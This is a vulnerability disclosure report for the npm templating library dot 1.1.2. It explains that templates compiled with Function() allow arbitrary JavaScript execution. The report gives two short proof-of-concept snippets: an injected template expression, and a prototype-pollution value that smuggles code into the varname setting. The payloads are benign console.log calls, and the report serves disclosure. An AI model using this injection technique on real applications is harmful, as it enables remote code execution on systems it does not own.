I would like to report a code injection vulnerability in dot.
It allows attackers to execute arbitrary JS code, especially when combined with a prototype pollution attack.

Module

module name: dotversion:1.1.2npm page: https://www.npmjs.com/package/dot

Module Description

Created in search of the fastest and concise JavaScript templating function with emphasis on performance under V8 and nodejs. It shows great performance for both nodejs and browsers.

doT.js is fast, small and has no dependencies.

Module Stats

76,838 downloads in the last week

Vulnerability

Vulnerability Description

dot uses Function() to compile templates. this can be exploited by the attacker if she can control the template or if she can control the value set on Object.prototype.

Steps To Reproduce:

a) The basic attack vector

var doT = require("dot");
var tempFn = doT.template("<h1>Here is a sample template " +
    "{{=console.log(23)}}</h1>");
tempFn({})

b) in combination with a prototype pollution attack

• create a folder “resources” and inside that a file called “mytemplate.dot” with the following content:

<h1>Here is a sample template</h1>

• in the folder containing the resources folder, create and execute the following js file

var doT = require("dot");
// prototype pollution attack vector
Object.prototype.templateSettings = {varname:"a,b,c,d,x=console.log(25)"};
// benign looking template compilation + application
var dots = require("dot").process({path: "./resources"});
dots.mytemplate();

Even though the template compilation + application looks safe, due to the prototype pollution, the attacker can execute arbitrary commands.

Patch

N/A remove Function() call

Wrap up

• I contacted the maintainer to let them know: N
• I opened an issue in the related repository: N

Impact

The attacker can achieve code injection/RCE if she can control the template or if she can set arbitrary properties on Object.prototype. Using Function() with runtime computed values is rarely safe.